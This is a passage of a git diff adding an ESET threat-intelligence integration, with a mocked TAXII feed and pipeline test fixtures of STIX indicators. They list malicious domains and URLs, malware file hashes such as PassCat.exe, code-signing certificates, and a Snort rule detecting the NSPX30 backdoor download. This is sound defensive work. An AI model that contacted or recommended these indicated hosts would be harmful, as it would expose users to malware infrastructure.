"[domain-name:value = 'billyconsult.com' AND domain-name:value = 'billyconsult.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2022-03-26T00:00:00Z", + "valid_until": "2023-09-29T00:00:00Z" + }, + { + "created": "2023-10-02T13:16:00.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T13:16:00.000Z", + "pattern": "[url:value = 'https://billyconsult.com/wp-media.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/wp-media.php' AND url:x_misp_port = '443']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2022-03-26T00:00:00Z", + "valid_until": "2023-09-29T00:00:00Z" + }, + { + "created": "2023-10-02T15:42:54.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T15:42:54.000Z", + "pattern": "[domain-name:value = 'brianrep.com' AND domain-name:value = 'brianrep.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-05-05T00:00:00Z", + "valid_until": "2023-09-28T00:00:00Z" + }, + { + "created": "2023-10-02T15:46:12.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T15:46:12.000Z", + "pattern": "[url:value = 'https://brianrep.com/dnquery.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/dnquery.php' AND url:x_misp_port = '443']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-05-05T00:00:00Z", + "valid_until": "2023-09-28T00:00:00Z" + }, + { + "created": "2023-10-02T12:10:47.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T12:10:47.000Z", + "pattern": "[x509-certificate:hashes.MD5 = '0a2fd4d1cdc852678a40cbccfd4b7fbd' AND x509-certificate:hashes.SHA1 = 'f23372e12d37178544acd7448f469ccaf71ad244' AND x509-certificate:hashes.SHA256 = '472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630' AND x509-certificate:issuer = 'C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA' AND x509-certificate:serial_number = '00c74f79c78393ebf22858e9ad3914567f' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-02-25 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-02-25 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-10-02T12:10:47Z" + } + ], + "next": "MjAyMy0xMC0xOVQwMDowNjozNy4xMzcwNjQrMDA6MDB8aW5kaWNhdG9yLS1kNDkxYzc5MC1kODc1LTQ3ZDctOTdmZC01Y2EyYTdhMWIyYmM=" + } + # URL + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--8986619a-150b-453c-aaa8-bfe8694d05cc", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:13.000Z", + "modified": "2023-10-19T02:00:13.000Z", + "name": "https://example.com/some/path", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "pattern": "[url:value='https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:13Z", + "valid_until": "2023-10-21T02:00:13Z", + "labels": [ + "benign" + ] + }, + { + "id": "indicator--6a4cd4da-7881-4831-ba48-771cd2788d7f", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:13.000Z", + "modified": "2023-10-19T02:00:13.000Z", + "name": "https://example.com/some/path", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "pattern": "[url:value='https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:13Z", + "valid_until": "2023-10-21T02:00:13Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowMDoyMC43NDg4NTYrMDA6MDB8aW5kaWNhdG9yLS02YTRjZDRkYS03ODgxLTQ4MzEtYmE0OC03NzFjZDI3ODhkN2Y=" + } diff --git a/packages/ti_eset/changelog.yml b/packages/ti_eset/changelog.yml new file mode 100644 index 00000000000..6a906ec20ad --- /dev/null +++ b/packages/ti_eset/changelog.yml @@ -0,0 +1,5 @@ +- version: "0.1.0" + changes: + - description: ESET Threat Intelligence package + type: enhancement + link: https://github.com/elastic/integrations/pull/9255 diff --git a/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..cd6aa6841d3 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,28 @@ +{"created": "2024-03-14T18:52:26.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2024-03-14T18:52:26.000Z", "pattern": "[x509-certificate:hashes.MD5 = '4ede38dcb043138971c429eaaa2d4696' AND x509-certificate:hashes.SHA1 = '28f9a8e7601f5338bf6e194151a718608c0124a8' AND x509-certificate:hashes.SHA256 = '23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '0139dde119bb320dfb9f5defe3f71245' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Seoul, O=Hangil IT Co.\\\\, Ltd, CN=Hangil IT Co.\\\\, Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-11-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-10 00:00:00+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "2.1", "type": "indicator", "valid_from": "2024-03-14T18:52:26Z"} +{"created": "2024-03-14T19:02:03.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--5467bc9d-6cec-487b-8584-8228ed4ba5c5", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2024-03-14T19:02:03.000Z", "pattern": "[domain-name:resolves_to_refs[*].value = '141.164.63.254']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "2.1", "type": "indicator", "valid_from": "2024-03-14T19:02:03Z"} +{"created":"2024-01-15T15:52:02.000Z","created_by_ref":"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f","id":"indicator--cba9e1c4-cb8a-4332-8193-7a663542d8ad","kill_chain_phases":[{"kill_chain_name":"misp-category","phase_name":"network"}],"labels":["misp:name=\"x509\"","misp:meta-category=\"network\"","misp:to_ids=\"True\""],"modified":"2024-01-15T15:52:02.000Z","pattern":"[x509-certificate:hashes.MD5 = '71b91c0a53cfc3515e45c8c3b72f88c0' AND x509-certificate:hashes.SHA1 = '30db7d678045e44d882d7652ba6aaa6593c02328' AND x509-certificate:hashes.SHA256 = '37320e24baa50e63b0a1dfe513922333d5a622254a4b2bcd116a24f43e52a101' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '008890cab1cd510cd20dab4ce5948cbc3a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Gyeonggi-do, O=D2innovation Co.,LTD, CN=D2innovation Co.,LTD' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2025-04-03 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-03-02 00:00:00+00:00']","pattern_type":"stix","pattern_version":"2.1","spec_version":"indicator","type":"indicator","valid_from":"2024-01-15T15:52:02Z"} +{"created":"2024-01-15T17:05:32.000Z","created_by_ref":"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f","id":"indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2","kill_chain_phases":[{"kill_chain_name":"misp-category","phase_name":"network"}],"labels":["misp:name=\"x509\"","misp:meta-category=\"network\"","misp:to_ids=\"True\""],"modified":"2024-01-15T17:05:32.000Z","pattern":"[x509-certificate:hashes.MD5 = 'ed8893f16d887956e6a8a433645655fc' AND x509-certificate:hashes.SHA1 = '1ce0c3a55850c7e3f6b904b73e856e414b8293d1' AND x509-certificate:hashes.SHA256 = 'f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a' AND x509-certificate:issuer = 'C=US, O=DigiCert\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1' AND x509-certificate:serial_number = '0187a16b5e3a704b7fcab2598f50005a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = '??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2022-11-29 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-29 00:00:00+00:00']","pattern_type":"stix","pattern_version":"2.1","spec_version":"indicator","type":"indicator","valid_from":"2024-01-15T17:05:32Z"} +{"created": "2023-11-17T19:00:49.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--16425bff-e5ba-4096-8883-0b340e892c45", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-11-17T19:00:49.000Z", "pattern": "[x509-certificate:hashes.MD5 = '8ad6881721a82127b46fd5d07a1fab4b' AND x509-certificate:hashes.SHA1 = '9ebf592dd04da5274f1db1da41ab1434dd4c6aa1' AND x509-certificate:hashes.SHA256 = 'd3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324' AND x509-certificate:issuer = 'C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3' AND x509-certificate:serial_number = '47f49de6c7e29352e9f0775f68e15d8b' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-09-19 11:51:47+00:00' AND x509-certificate:validity_not_before = '2022-09-20 11:51:47+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-11-17T19:00:49Z"} +{"created": "2023-11-01T04:41:36.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"snort\"", "misp:category=\"Network activity\""], "modified": "2023-11-01T04:41:36.000Z", "pattern": "[alert tcp any any -> any 80 \\\r\n (msg:\"Matches HTTP GET request by NSPX30's orchestrator when obtaining the backdoor.\"; gid:45534554; sid:45030002; rev:1;\\\r\n metadata: author \"ESET Research\", date \"2023-10-31\", hash \"82295E138E89F37DD0E51B1723775CBE33D26475\",\\\r\n copyright \"ESET Research\", distribution \"Distribution is forbidden. Do not upload to any multi-scanner or share on any threat intel platform.\";\\\r\n content: \"GET /id=\"; content: \"User-Agent: Mozilla/4.0 (compatible\\;MSIE 5.0\\; Windows 98)|0d 0a|Host: www.baidu.com|0d 0a|\";)]", "pattern_type": "snort", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-11-01T04:41:36Z"} +{"created": "2023-09-29T09:12:42.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T09:12:42.000Z", "pattern": "[domain-name:value = 'acertab.info']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-14T11:39:37Z"} +{"created": "2023-09-29T08:48:51.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"x509\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:51.000Z", "pattern": "[x509-certificate:hashes.MD5 = 'ef36b08d59b9a6b2f538c1d24967fa23' AND x509-certificate:hashes.SHA1 = '0cd26ef0b232e6ed9910733e1d175a80a083aa08' AND x509-certificate:hashes.SHA256 = 'e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '3bd92ce9987095f74623d7c37e8d344e' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-05-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-05-10 00:00:00+00:00']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T08:48:51Z"} +{"created": "2023-09-29T09:00:06.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T09:00:06.000Z", "pattern": "[file:hashes.MD5 = 'd7519b822434fb89fb3643bc2f450e23' AND file:hashes.SHA1 = '4fcf10a8fe9db80c3eaf172636a602f95b64b0fc' AND file:hashes.SHA256 = '732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-28T14:40:01Z"} +{"created": "2023-09-29T09:00:10.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T09:00:10.000Z", "pattern": "[file:hashes.MD5 = '36b06d73347fe0da8177bd212e2b3f77' AND file:hashes.SHA1 = 'f1fc033763b931a729b9da3eb29a0724fd3eb6b9' AND file:hashes.SHA256 = 'a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9' AND file:name = 'fghsd.bat']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-28T19:07:41Z"} +{"created": "2023-09-29T08:48:42.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:42.000Z", "pattern": "[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-26T07:00:04Z"} +{"created": "2023-09-29T08:48:47.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:47.000Z", "pattern": "[file:hashes.MD5 = 'b8ef6fbfda87b44d969f338b958b2257' AND file:hashes.SHA1 = 'a85c7e14848013efb20469b35e8b70f1e447d54f' AND file:hashes.SHA256 = '354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14' AND file:name = 'kafil.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 'd6fe0b6872f80fca2efdb7ab10124297' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-18 05:12:45+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '1533427735186cdf43ffb09e53cfe0072393c3651791301e6723957100d481e3']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-19T12:07:09Z"} +{"created": "2023-09-29T08:48:51.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:48:51.000Z", "pattern": "[file:hashes.MD5 = '2995a24f6bb7eef7824a5e309fbb3443' AND file:hashes.SHA1 = 'bd1dc1b52d55c6b236b1c768353666be962109a6' AND file:hashes.SHA256 = '5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981' AND file:name = 'Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:parent_directory_ref.path = 'Letter Outward No 1514' AND file:x_misp_fullpath = 'Letter Outward No 1514/Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-11 07:50:16+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '01a392201f4c58b1fc3630669ed269df858ec78a6fe1050fb24d32b1b33bd58c']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-14T11:39:37Z"} +{"created": "2023-09-29T08:59:10.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:59:10.000Z", "pattern": "[file:hashes.MD5 = '7c3c16981350845838d6f69f50568434' AND file:hashes.SHA1 = 'afcc824bd83676badd5712dbfac1c61468480d54' AND file:hashes.SHA256 = '1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e' AND file:name = 'as.dll' AND file:extensions.'windows-pebinary-ext'.imphash = '7e40594946c0c9f8153242b822cd655e' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 06:59:18+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '2b01fca027096cda8ed7f168621a9ee485eef04cf7e9099590d97e798d1e165a']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-25T08:02:07Z"} +{"created": "2023-09-29T08:59:50.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T08:59:50.000Z", "pattern": "[file:hashes.MD5 = 'f4671beb11a28846a53f81ac1ba333e4' AND file:hashes.SHA1 = '3c4efa52fcfa42f0dccaee70cec7462811fb7b06' AND file:hashes.SHA256 = 'e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605' AND file:name = 'PassCat.exe' AND file:extensions.'windows-pebinary-ext'.imphash = '9dab9f23fae6ad65306a199dde7e7b03' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-05 11:47:35+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'f12714cb47ff720487d41c8edb874ddf9ccffc5baa9b36d6d54bb6ea8b70e5d4']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-07T09:01:06Z"} +{"created": "2023-10-03T13:20:09.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--c2d3ca78-8832-4f2c-a770-59184731baf5", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T13:20:09.000Z", "pattern": "[domain-name:value = 'anguisbi.ru']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-07T06:13:58Z"} +{"created": "2023-10-03T13:20:52.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--fd162f17-3d98-4129-9574-06ecdf733f6f", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"url\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T13:20:52.000Z", "pattern": "[url:value = 'http://134.209.223.199' AND url:x_misp_scheme = 'http' AND url:x_misp_port = '80']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-08T06:31:14Z"} +{"created": "2023-10-03T11:49:09.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--cdc79d14-87bc-4011-b371-55fef054e1bd", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "file"}], "labels": ["misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\""], "modified": "2023-10-03T11:49:09.000Z", "pattern": "[file:hashes.MD5 = '376002acdf350488c4a3cb5c75e8bbf1' AND file:hashes.SHA1 = '654f86929a79700157f1ea10db4abe2d3e2be4e9' AND file:hashes.SHA256 = '460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583' AND file:extensions.'windows-pebinary-ext'.imphash = '318afb7c57acecbbf5ad0df6b8baf133' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2010-11-08 12:27:29+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'dbb3f575e62986974e9e20cbe57226f73f630fb59d547b99d37ca0bcc247d33b' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = '7z Setup SFX (x86)' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00a9 2005-2010 Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = '7-Zip SFX' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = '7ZSfxMod_x86.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = '7ZSfxMod' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-27T05:34:03Z"} +{"created": "2023-09-29T19:44:05.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--8ea4a915-b7d5-448c-91f9-1f328102f800", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"email-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\""], "modified": "2023-09-29T19:44:05.000Z", "pattern": "[email-message:to_refs[*].value = 'joannburke1987@portugalmail.pt']", "pattern_type": "stix", "pattern_version": "2.1", "spec_version": "indicator", "type": "indicator", "valid_from": "2023-09-29T19:44:05Z"} +{"created": "2023-09-29T17:58:54.000Z", "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", "id": "indicator--f89cd8e8-3dfa-4157-bb4d-33ee9d7e054c", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "network"}], "labels": ["misp:name=\"email\"", 